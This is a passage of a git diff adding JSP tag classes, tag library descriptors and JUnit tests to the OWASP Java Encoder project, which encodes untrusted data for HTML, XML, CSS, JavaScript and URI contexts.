java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Comment Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlCommentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlComment(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java new file mode 100644 index 0000000..c5540ef --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlContentTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Content Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXmlAttribute(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlContentTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXmlContent(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java new file mode 100644 index 0000000..ea9ebea --- /dev/null +++ b/jsp/src/main/java/org/owasp/encoder/tag/ForXmlTag.java @@ -0,0 +1,52 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import java.io.IOException; +import javax.servlet.jsp.JspException; +import org.owasp.encoder.Encode; + +/** + * A tag to perform XML Encoding. + * This wraps the {@link org.owasp.encoder.Encode#forXml(java.lang.String)}. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForXmlTag extends EncodingTag { + @Override + public void doTag() throws JspException, IOException { + Encode.forXml(getJspContext().getOut(), _value); + } +} diff --git a/jsp/src/main/resources/META-INF/java-encoder-advanced.tld b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld new file mode 100644 index 0000000..becab48 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder-advanced.tld @@ -0,0 +1,560 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project#advanced + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.tag.ForJavaScriptAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.tag.ForJavaScriptBlockTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.tag.ForJavaScriptSourceTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + forXmlComment + org.owasp.encoder.tag.ForXmlCommentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + org.owasp.encoder.Encode + java.lang.String forXmlComment(java.lang.String) + forXmlComment(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.Encode + java.lang.String forJavaScriptAttribute(java.lang.String) + forJavaScriptAttribute(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. + + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.Encode + java.lang.String forJavaScriptBlock(java.lang.String) + forJavaScriptBlock(unsafeData) + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.Encode + java.lang.String forJavaScriptSource(java.lang.String) + + <%@page contentType="text/javascript; charset=UTF-8"%> + var data = '${forJavaScriptSource(unsafeData)}'; + + + \ No newline at end of file diff --git a/jsp/src/main/resources/META-INF/java-encoder.tld b/jsp/src/main/resources/META-INF/java-encoder.tld new file mode 100644 index 0000000..b761de0 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder.tld @@ -0,0 +1,403 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + \ No newline at end of file diff --git a/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java new file mode 100644 index 0000000..10705ae --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + +package org.owasp.encoder.tag; + +import junit.framework.TestCase; +import org.springframework.mock.web.MockHttpServletRequest; +import org.springframework.mock.web.MockHttpServletResponse; +import org.springframework.mock.web.MockPageContext; +import org.springframework.mock.web.MockServletContext; + +/** + * EncodingTagTest is the base class for all unit tests for the tags. + * This sets up the ServletContext so that tags can be tested. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public abstract class EncodingTagTest extends TestCase { + + protected MockServletContext _servletContext; + protected MockPageContext _pageContext; + protected MockHttpServletRequest _request; + protected MockHttpServletResponse _response; + + /** + * Contructor for the EncodingTagTest + * @param testName the name of the test + */ + public EncodingTagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + _servletContext = new MockServletContext(); + _request = new MockHttpServletRequest(); + _response = new MockHttpServletResponse(); + _pageContext = new MockPageContext(_servletContext, _request, _response); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java new file mode 100644 index 0000000..1720d4e --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCDATATag. + * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATagTest extends EncodingTagTest { + + public ForCDATATagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCDATATag. + * This is a very simple test that doesn't fully + * excersize/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCDATATag instance = new ForCDATATag(); + String value = "
    ]]>
    "; + String expected = "
    ]]>]]
    "; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java new file mode 100644 index 0000000..7a79d40 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java @@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS 